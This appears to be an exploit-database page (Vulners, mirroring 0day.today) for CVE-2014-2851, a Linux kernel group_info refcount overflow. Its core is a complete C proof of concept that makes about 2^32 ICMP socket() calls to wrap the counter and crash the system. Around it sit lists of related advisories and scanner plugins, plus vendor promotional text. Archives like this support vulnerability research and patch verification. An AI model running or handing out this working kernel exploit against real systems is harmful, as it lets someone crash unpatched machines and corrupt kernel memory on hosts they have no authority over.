Lucene search
K

linux group_info refcounter - Overflow Memory Corruption

🗓️ 19 Apr 2014 00:00:00Reported by Thomas PolletType 
zdt
 zdt
🔗 0day.today👁 51 Views

Linux group_info refcounter memory overflow DoS poc for CVE-2014-2851. Execute socket() calls to trigger overflow

Related
Code
ReporterTitlePublishedViews
Family
BDU FSTEC
The vulnerability of the Linux operating system, which allows a malicious individual to trigger a service failure or increase their privileges.
5 Jul 201600:00
bdu_fstec
BDU FSTEC
Vulnerabilities in the SUSE Linux Enterprise operating system that allow attackers to compromise the confidentiality, integrity, and accessibility of protected information
28 Apr 201500:00
bdu_fstec
BDU FSTEC
Vulnerabilities in the SUSE Linux Enterprise operating system that allow attackers to compromise the confidentiality, integrity, and accessibility of protected information
28 Apr 201500:00
bdu_fstec
BDU FSTEC
Vulnerabilities in the SUSE Linux Enterprise operating system that allow attackers to compromise the confidentiality, integrity, and accessibility of protected information
28 Apr 201500:00
bdu_fstec
BDU FSTEC
Vulnerabilities in the SUSE Linux Enterprise operating system that allow attackers to compromise the confidentiality, integrity, and accessibility of protected information
28 Apr 201500:00
bdu_fstec
Tenable Nessus
CentOS 6 : kernel (CESA-2014:0981)
1 Aug 201400:00
nessus
Tenable Nessus
Debian DSA-2926-1 : linux - security update
13 May 201400:00
nessus
Tenable Nessus
EulerOS Virtualization 3.0.1.0 : kernel (EulerOS-SA-2019-1479)
13 May 201900:00
nessus
Tenable Nessus
EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1534)
14 May 201900:00
nessus
Tenable Nessus
Fedora 20 : kernel-3.13.10-200.fc20 (2014-5235)
21 Apr 201400:00
nessus
Rows per page
/*
 * DoS poc for CVE-2014-2851
 * Linux group_info refcounter overflow memory corruption
 *
 * https://lkml.org/lkml/2014/4/10/736
 *
 * @Tohmaxx - http://thomaspollet.blogspot.be
 *
 * If the app doesn't crash your system, try a different count (argv[1])
 * Execution takes a while because 2^32 socket() calls
 *
 */
 
#include <arpa/inet.h>
#include <stdio.h>
#include <sys/socket.h>
int main(int argc, char *argv[]) {
    int i ;
    struct sockaddr_in saddr;
    unsigned count = (1UL<<32) - 20 ;
    if(argc >= 2){
        // Specify count
        count = atoi(argv[1]);
    }
    printf("count 0x%x\n",count);
    for(i = 0 ; (unsigned)i < count;i++ ){
        socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
        if ( i % ( 1 << 22 ) == 0 )
            printf("%i \n",i);
    }
    //Now make it wrap and crash:
    system("/bin/echo bye bye");
}

#  0day.today [2018-03-01]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 Apr 2014 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.00299
51